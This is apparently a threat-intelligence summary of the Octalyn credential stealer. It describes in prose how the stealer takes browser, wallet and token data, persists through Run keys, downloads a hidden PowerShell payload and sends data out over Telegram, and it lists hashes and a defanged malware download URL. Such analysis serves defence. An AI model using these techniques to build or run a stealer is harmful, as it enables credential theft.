Threat Research

OCTALYN STEALER UNMASKED

Cyfirma
OCTALYN STEALER UNMASKED

The Octalyn Forensic Toolkit is a C++ and Delphi-based credential stealer disguised as a forensic research tool, capable of extracting browser data, cryptocurrency wallets, and social media tokens, with data exfiltration conducted via Telegram. Its modular design, persistence mechanisms, and obfuscated payloads make it a significant threat when misused by malicious actors. #OctalynForensicToolkit #TelegramBuild.exe #CredentialStealer

Keypoints

  • The Octalyn Forensic Toolkit is publicly available on GitHub, consisting of a Delphi-based builder and a C++ payload module for credential theft and data exfiltration.
  • The malware steals browser cookies, passwords, autofill data, Discord and Telegram tokens, VPN configurations, gaming credentials, and cryptocurrency wallet information.
  • Data exfiltration is performed covertly through a Telegram bot using embedded bot tokens and chat IDs for real-time communication.
  • The Toolkit establishes persistence on Windows via Startup folder copying and registry Run key modification to ensure continuous operation.
  • The payload employs obfuscation and packing to evade detection, dropping multiple executables silently into the %TEMP% directory using Windows API functions.
  • A Base64-encoded PowerShell script downloads a secondary payload from a GitHub repository, indicating ongoing threat actor control and potential future attacks.
  • The stolen data is organized into structured directories (e.g., Crypto wallets, VPN, Browsers) to facilitate efficient use by attackers.

MITRE Techniques

  • [T1189] Drive-by Compromise – The malware is publicly available for download from GitHub, enabling easy initial access (“The Octalyn Forensic Toolkit, publicly hosted on GitHub”).
  • [T1059] Command and Scripting Interpreter – Uses PowerShell scripts for payload execution and data compression (“uses a PowerShell script to compress the stolen data into a ZIP archive”).
  • [T1059.001] PowerShell – Executes Base64-encoded PowerShell commands in hidden mode to download additional payloads (“The malware then uses a Base64-encoded PowerShell command, executed in hidden mode”).
  • [T1204] User Execution – The toolkit requires an operator to supply Telegram bot token and chat ID to build the payload (“The builder requires only a Telegram bot token and chat ID”).
  • [T1547.001] Registry Run Keys / Startup Folder – Establishes persistence by copying payload to Startup folder and modifying HKCU Run keys (“rvn.exe is copied to the Startup folder… It also modifies the Windows Registry Run key”).
  • [T1140] De-obfuscate/Decode Files or Information – Uses obfuscation techniques and unpacking to hinder analysis (“Build.exe has an entropy score above 7, indicating that it is packed or obfuscated”).
  • [T1027] Obfuscated Files or Information – Payloads are obfuscated to evade detection (“high obfuscation and further confirming that the embedded files are designed to evade analysis”).
  • [T1124] System Time Discovery – Utilized in the malware’s execution for system reconnaissance (“System Time Discovery”).
  • [T1010] Application Window Discovery – The malware operates silently without user interface (“executed silently in a hidden Windows shell”).
  • [T1018] Remote System Discovery – Collects information for lateral movement or profiling (“Remote System Discovery”).
  • [T1217] Browser Information Discovery – Extracts cookies, passwords, and browser session tokens (“The malware extracts cookies, which are decrypted using Chrome’s local encryption keys”).
  • [T1083] File and Directory Discovery – Searches and creates directories for stolen data (“creates subdirectories such as Cryptowallets and Extension”).
  • [T1082] System Information Discovery – Collects system information as part of data theft (“system information”).
  • [T1012] Query Registry – Modifies and queries registry keys for persistence (“creates a new Run key under HKCUSoftware…”).
  • [T1560] Archive Collected Data – Uses PowerShell to compress collected data into ZIP archives (“compress the stolen data into a ZIP archive”).
  • [T1573] Encrypted Channel – Exfiltrates data over encrypted Telegram API communication (“a secure connection over TLS to the Telegram API endpoint”).
  • [T1095] Non-Application Layer Protocol – Uses Telegram protocol for command and control communication (“Telegram C2 integration”).
  • [T1071] Application Layer Protocol – Communicates over Telegram bot API for data exfiltration (“transmit exfiltrated data and receive commands from the attacker-controlled Telegram bot”).

Indicators of Compromise

  • [File Hashes] Malicious executables related to Octalyn components – 8bd9925f7b7663ca2fcb305870248bd5de0c684342c364c24ef24bffbcdecd8b (Octalynstealer.exe), 3b3a096a9c507529919f92154f682490fa8e135f3460549a917cf23113a7b828 (Build.exe), 8bb868a4bd9ed5e540c3d6717b0baa1cd831fc520ee02889bc55e2aac66d9d34 (rvn.exe), cea94fd48ef98f6e9db120cdb33fa1099846ebcf9e6d6f8de3b53250d2087f0a (asembly.exe)
  • [File Hashes] Additional payload and helper tools – 8af7fc21bc9c13d877f598886f363a4c7c1105bcda18e17db74d7e1584a9cae2 (TelegramBuild.exe), abe96669d90f52529b5dad847f43961a4b8b56c3893f6233a404b688c5a6069e (svchost.exe), 44778cf0de10af616ef2d8a5cc5048f7cf0faa204563eab590a1a9ea4a168ef7 (binder.exe)
  • [Domain] GitHub-hosted payload delivery URL – github[.]com/git-user691/psycho/releases/download/v1/rundll32.exe (used to download the second-stage payload)
  • [File Names] Dropped executables and data folders – TelegramBuild.exe, rvn.exe, assembly.exe, folder %TEMP%ctalyn with subdirectories such as Cryptowallets and Extension for stolen data storage

Read more: https://www.cyfirma.com/research/octalyn-stealer-unmasked/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint